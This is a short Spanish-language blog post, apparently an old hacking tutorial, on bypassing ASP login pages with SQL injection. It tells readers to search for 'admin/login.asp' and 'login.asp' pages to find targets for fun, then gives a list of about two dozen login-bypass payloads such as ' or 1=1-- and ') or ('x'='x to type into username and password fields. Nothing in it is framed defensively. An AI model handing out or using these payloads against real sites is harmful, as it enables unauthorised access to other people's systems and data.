Uno de los principales problemas con SQL es su pobreza en cuestiones relativas a la seguridad en logins y url strings.
No entraremos en detalles y simplemente buscamos:
"admin/login.asp"
"login.asp"
Con estas 2 busquedas tendremos diversion para rato.
ahora como sera la inyeccion?
bueno esta es la parte mas facil, en el formulario de acceso ingresa algo asi:
user:admin (esto en realidad es innesesario)
pass:' or 1=1--
o
user:' or 1=1--
admin:' or 1=1--
Algunas webs solo requieren password por lo tanto
password:' or 1=1--
Aca dejo algunas variaciones de injecciones:
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Fuente y Traduccion al Ingles: http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php
.ASP login ByPass
Suscribirse a:
Enviar comentarios (Atom)
0 comentarios:
Publicar un comentario